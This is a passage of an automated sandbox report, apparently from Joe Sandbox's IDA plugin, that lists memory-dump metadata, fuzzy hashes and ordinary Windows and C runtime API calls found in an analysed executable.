                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AdjustPointer
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1740715915-0
                                                                                                                                                                                                                                        • Opcode ID: e288ddfc0c6c95a45c9ed1d30c06b89fd299e45d33668e0a26e2a5085ec9c045
                                                                                                                                                                                                                                        • Instruction ID: d70577900cbec8afc54de056196ed28abd4218123c28e8dccf24ce4ece52be2b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e288ddfc0c6c95a45c9ed1d30c06b89fd299e45d33668e0a26e2a5085ec9c045
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8351F376A09202AFEF299F50F841BBAB7B4FF51710F25442DE90697291E771ED80C790
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0019FAC9: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,001A12A5,?,00000000,-00000008), ref: 0019FB2A
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 001A578A
                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 001A5791
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 001A57CB
                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 001A57D2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1913693674-0
                                                                                                                                                                                                                                        • Opcode ID: ef7035f6263b3361667f3c46ebe9f480371678863a4b247377e8654e37a0bd3a
                                                                                                                                                                                                                                        • Instruction ID: f2f70a62097f2cebee1a20f5d10e6dfb9effe3ee7f3b500b87bdad0f749d110c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ef7035f6263b3361667f3c46ebe9f480371678863a4b247377e8654e37a0bd3a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A21C275608A05EFDF20EFA5DC8082BB7AAEF163647958519FC19A7111E731EC009BA0
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 526649727095ab0c15bf0b565b387b41659f6b10cd8ab8a0821f326562a7b1e1
                                                                                                                                                                                                                                        • Instruction ID: 9ffef12c48d3c0854f13bc61f3fb389e92d63f43bb039a5bd6f81f39d641ab9c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 526649727095ab0c15bf0b565b387b41659f6b10cd8ab8a0821f326562a7b1e1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D321DF31600209AFDF20EF79CC40E6BB7A9EF543687118528F92AC7161E731EC0287A0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 001A64EE
                                                                                                                                                                                                                                          • Part of subcall function 0019FAC9: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,001A12A5,?,00000000,-00000008), ref: 0019FB2A
                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001A6526
                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001A6546
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 158306478-0
                                                                                                                                                                                                                                        • Opcode ID: 32dd9a7714b111865e93a67fa331875a86b79853276b59fbbf281cbe42c9f73e
                                                                                                                                                                                                                                        • Instruction ID: f692cafa77263fe07c69214ebb22689c5fe0e1643ac50fd3ef449c978885e02e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 32dd9a7714b111865e93a67fa331875a86b79853276b59fbbf281cbe42c9f73e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3211C4B5D112157F6B1227B6AC89D7F699CDE673D87180129F805D2105FB60CE0251F0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,001ADA5F,00000000,00000001,?,?,?,001A79F2,?,00000000,00000000), ref: 001AF4BF
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,001ADA5F,00000000,00000001,?,?,?,001A79F2,?,00000000,00000000,?,?,?,001A7338,?), ref: 001AF4CB
                                                                                                                                                                                                                                          • Part of subcall function 001AF520: CloseHandle.KERNEL32(FFFFFFFE,001AF4DB,?,001ADA5F,00000000,00000001,?,?,?,001A79F2,?,00000000,00000000,?,?), ref: 001AF530
                                                                                                                                                                                                                                        • ___initconout.LIBCMT ref: 001AF4DB
                                                                                                                                                                                                                                          • Part of subcall function 001AF4FD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001AF499,001ADA4C,?,?,001A79F2,?,00000000,00000000,?), ref: 001AF510
                                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,001ADA5F,00000000,00000001,?,?,?,001A79F2,?,00000000,00000000,?), ref: 001AF4F0
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2744216297-0
                                                                                                                                                                                                                                        • Opcode ID: f7dc0060f09a3d6149d1cf28f3a210c05575be4bee763926d3663112c4b45a7e
                                                                                                                                                                                                                                        • Instruction ID: a3e3ba795d533b368d3591558370e86cddcee5f13a2ab5f6b07e507c107a74de
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7dc0060f09a3d6149d1cf28f3a210c05575be4bee763926d3663112c4b45a7e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57F0C03A501119BBDF225FD9EC0899A3F66FF4E7A1F144264FA1899530D732C8A1DBE0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SleepConditionVariableCS.KERNELBASE(?,0018E92C,00000064), ref: 0018E9C6
                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(001C0118,?,?,0018E92C,00000064,?,?,0018B8E5,?,00000001,?,?,?,?,?,?), ref: 0018E9D0
                                                                                                                                                                                                                                        • WaitForSingleObjectEx.KERNEL32(0018E92C,00000000,?,0018E92C,00000064,?,?,0018B8E5,?,00000001,?,?,?,?,?,?), ref: 0018E9E1
                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(001C0118,?,0018E92C,00000064,?,?,0018B8E5,?,00000001,?,?,?,?,?,?,5E6871BB), ref: 0018E9E8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3269011525-0
                                                                                                                                                                                                                                        • Opcode ID: 6524e1191d85a674bfff2843eb67e77baf03e27d119b970d181e78060a7c8f97
                                                                                                                                                                                                                                        • Instruction ID: 1871d1c0acf0b65452708bc1954746ac08abe1d1eb164cc5660eb521d9f65a9e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6524e1191d85a674bfff2843eb67e77baf03e27d119b970d181e78060a7c8f97
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15E09231941128FBCB072B90EC0AE99BF54BB18B52B080015F50A6256087B1C9909BE0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 0019471D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorHandling__start
                                                                                                                                                                                                                                        • String ID: pow
                                                                                                                                                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                        • Opcode ID: 182502a14dd8444f9667934233d0a1e9665e968a1724737bfe5976345f76af79
                                                                                                                                                                                                                                        • Instruction ID: fbbbe9380716e04140dd89dd6581a143720d4cb989872eff94cab64f44772265
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 182502a14dd8444f9667934233d0a1e9665e968a1724737bfe5976345f76af79
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9515B61A08206A7CF1D7B94C941B7A3BA4DB51B51F308E7CE0D5C22B9EF348CD79A46
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0019FC1A: GetLastError.KERNEL32(00000000,?,001A1F9D), ref: 0019FC1E
                                                                                                                                                                                                                                          • Part of subcall function 0019FC1A: SetLastError.KERNEL32(00000000,?,?,00000028,0019AC4F), ref: 0019FCC0
                                                                                                                                                                                                                                        • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,0019839D,?,?,?,00000055,?,-00000050,?,?,?), ref: 001A4395
                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,0019839D,?,?,?,00000055,?,-00000050,?,?), ref: 001A43CC
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                        • String ID: utf8
                                                                                                                                                                                                                                        • API String ID: 943130320-905460609
                                                                                                                                                                                                                                        • Opcode ID: 71b3b01bee7c3d32ec7c21c6d338893ce7713fa9344dd6e5bcd0e82d2a4d9fcc
                                                                                                                                                                                                                                        • Instruction ID: d93a3653711f886fa0331aed44e27d0df1c35fc2ece5723520ed0569cd8421a6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71b3b01bee7c3d32ec7c21c6d338893ce7713fa9344dd6e5bcd0e82d2a4d9fcc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F851283DA00312ABEB25AB708C42BB773A8FF9B700F154529F589D7181E7F0E94086A1
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0019D995
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                                        • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                        • Opcode ID: 9dd096ed45c80ddd0a501b6a70fc4b1c9a744c78a7bbcefd9ef2bde475ffb799
                                                                                                                                                                                                                                        • Instruction ID: 6adb9e8068d9512571e525b3baa3eb687c8d1a32f468fb7bb8c85cfbda751f59
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9dd096ed45c80ddd0a501b6a70fc4b1c9a744c78a7bbcefd9ef2bde475ffb799
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B312232404219EFDF269F94EC419AA7B66FF08359B18865AFD545B121C332CCB2DB82
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0017B82B
                                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0017B950
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                                        • String ID: bad locale name
                                                                                                                                                                                                                                        • API String ID: 3988782225-1405518554
                                                                                                                                                                                                                                        • Opcode ID: 384527dde514531a471ccec00f8fc7bbb4a33d8df12fdd645a9dc755a0a0439e
                                                                                                                                                                                                                                        • Instruction ID: 0b2d1e01f4af24da3c1fd4ec45b9b255cb5007e68e958201dc0def208c21f84f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 384527dde514531a471ccec00f8fc7bbb4a33d8df12fdd645a9dc755a0a0439e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51217C71304B058BD7348E3998D531B76E2EFE8314F24C91CC1A94B744C3B99C08CB92